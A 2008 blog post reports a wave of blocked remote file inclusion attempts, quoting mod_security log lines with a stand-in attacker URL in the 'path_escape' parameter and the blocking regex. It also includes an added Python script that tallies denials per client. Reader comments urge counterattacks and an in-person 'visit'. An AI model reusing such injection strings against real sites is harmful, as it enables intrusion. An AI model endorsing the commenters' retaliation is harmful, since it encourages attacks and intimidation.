The reason for all those 500 errors…

We are being flooded by hack attempts. Here is an excerpt of the access logs:

[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match "=(\\\\.\\\\.|http|https|ftp)\\\\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "getyacg.com"] [uri "/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL"]
[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match "=(\\\\.\\\\.|http|https|ftp)\\\\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "getyacg.com"] [uri "///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL"]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match "=(\\\\.\\\\.|http|https|ftp)\\\\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "getyacg.com"] [uri "/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL"]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match "=(\\\\.\\\\.|http|https|ftp)\\\\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "getyacg.com"] [uri "///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL"]
[Mon Jan 7 09:30:39 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match "=(\\\\.\\\\.|http|https|ftp)\\\\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "getyacg.com"] [uri "/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL"]
[Mon Jan 7 09:30:39 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match "=(\\\\.\\\\.|http|https|ftp)\\\\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "getyacg.com"] [uri "///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL"]

It’s all coming from the same host, and I have a pretty good idea of what they are attempting… But I’m not sure if it’s an automated attack and I’m a random victim or it’s a personal attack against [YACG].

I will take care of this ASAP and let you guys know what this is all about…
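The question the post raises (one host or several, scripted or not) can be checked by tallying the denials per client. The following Python is an added example, not part of the original post: `parse`, `summarize` and the sample lines are constructed for illustration, and the same-second burst count is only a heuristic hint of scripted traffic.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample modelled on the excerpt above (client address masked as in the
# post); the third entry keeps the typographic quotes a blog engine substitutes.
SAMPLE = r'''
[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match "=(\\\\.\\\\.|http|https|ftp)\\\\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "getyacg.com"] [uri "/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL"]
[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match "=(\\\\.\\\\.|http|https|ftp)\\\\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "getyacg.com"] [uri "///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL"]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match "=(\\\\.\\\\.|http|https|ftp)\\\\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "getyacg.com"] [uri "///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL"]
[Mon Jan 7 09:18:24 2008] [notice] constructed unrelated line, must be skipped
'''
QUOTES = str.maketrans("\u201c\u201d\u2033", '"""')
HEAD = re.compile(r'^\[([^\]]+)\] \[error\] \[client ([^\]]+)\] mod_security: Access denied with code (\d+)\.')
FIELD = re.compile(r'\[(\w+) "([^"]*)"\]')

def parse(line):
    """Return one mod_security denial as a dict, or None for any other line."""
    line = line.translate(QUOTES)          # undo typographic quotes from copy/paste
    m = HEAD.match(line)
    if not m:
        return None
    rec = dict(FIELD.findall(line))        # id, rev, msg, severity, hostname, uri
    rec.update(time=datetime.strptime(m[1], "%a %b %d %H:%M:%S %Y"), client=m[2], code=int(m[3]))
    return rec

def summarize(text):
    """Group denials by client: volume, rule ids, distinct URIs, time span, burst size."""
    by_client = defaultdict(list)
    for rec in filter(None, map(parse, text.splitlines())):
        by_client[rec["client"]].append(rec)
    report = {}
    for client, recs in by_client.items():
        times = sorted(r["time"] for r in recs)
        report[client] = {
            "hits": len(recs),
            "rules": sorted({r.get("id", "?") for r in recs}),
            "uris": sorted({r.get("uri", "?") for r in recs}),
            "span_seconds": int((times[-1] - times[0]).total_seconds()),
            "max_per_second": Counter(times).most_common(1)[0][1],
        }
    return report

if __name__ == "__main__":
    for client, info in summarize(SAMPLE).items():
        print(client, info)
```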

3 Responses to “The reason for all those 500 errors…”


  1. 1 John

    Let's find those bastards. I've been getting attacked since the 6th: first a DDoS, then a cPanel attack, then all SQL databases were dumped. I would love to find the bastard that is doing this. When you find him or her, let me know. I don't work and I would love to pay the weasels a visit. Us Georgia boys will take care of it for you, boss.

  2. 2 Mr Black Hat

    Hello my friend, I guess this explains what happened to the SERPs as of late. You know we are with you, just tell us and we will attack the fools. Any moron that will attack the coolest blackhat just has to be dealt with.

    As always, you rock, they suck. Let's get 'em.

  3. 3 neurochaos

    hi there

    I found your blog and site recently. Great ideas, so thanks for sharing your knowledge. I am wondering, though, what this was all about, I mean these hack attempts? Did you take care of this, and what's the resolution?
